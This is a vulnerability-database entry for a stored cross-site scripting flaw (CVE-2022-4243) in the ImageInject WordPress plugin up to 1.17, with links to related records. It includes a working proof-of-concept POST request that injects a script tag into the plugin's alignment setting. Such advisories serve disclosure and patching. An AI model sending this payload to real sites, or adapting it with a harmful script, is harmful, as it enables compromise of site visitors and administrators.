Lucene search
IohexWPEX-ID:FC1FC057-97EE-4A10-909F-2F11EAFA0BD0HistoryDec 02, 2022 - 12:00 a.m.
ImageInject <= 1.17 - Admin+ Stored XSS
2022-12-0200:00:00
iohex
112
imageinject
stored xss
admin interface
exploit
security vulnerability
EPSS
0.001
Percentile
25.3%
The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
POST /wp-admin/options-general.php?page=wpdf-options HTTP/1.1
Referer: http://example.com/wp-admin/options-general.php?page=wpdf-options
Cookie: [admin+]
Connection: close
_wpnonce=<nonce key>&flickr_enabled=1&flickr_license=4%2C5%2C6%2C7&flickr_sort=relevance&pixabay_enabled=1&pixabay_image_type=all&general_save_images=1&general_feat_img_size=medium&general_default_align=none&general_attr_location=caption&general_items_per_req=40&advanced_img_template=%3Cimg+title%3D%22%7Btitle%7D+by+%7Bauthor%7D%22+alt%3D%22%7Bkeyword%7D+photo%22+src%3D%22%7Bsrc%7D%22+%2F%3E&advanced_attr_template=%3Csmall%3EPhoto+by+%3Ca+href%3D%22%7Blink%7D%22+target%3D%22_blank%22%3E%7Bauthor%7D%3C%2Fa%3E+%7Bcc_icon%7D%3C%2Fsmall%3E&advanced_attr_template_multi=%3Csmall%3EPhotos+by+%7Blinklist%7D%3C%2Fsmall%3E&advanced_filename_template=%7Bfilename%7D_%7Bkeyword%7D&save_options=Save+All+Settings&general_default_align=</script><script>alert(/xss/)</script>Related
cvelist
cvelist
CVE-2022-4243 ImageInject <= 1.17 - Admin+ Stored XSS
2022-12-26 12:28:00
wpvulndb
wpvulndb
ImageInject <= 1.17 - Admin+ Stored XSS
2022-12-02 00:00:00
prion
prion
Cross site scripting
2022-12-26 13:15:00
nvd
nvd
CVE-2022-4243
2022-12-26 13:15:13
cve
cve
CVE-2022-4243
2022-12-26 13:15:13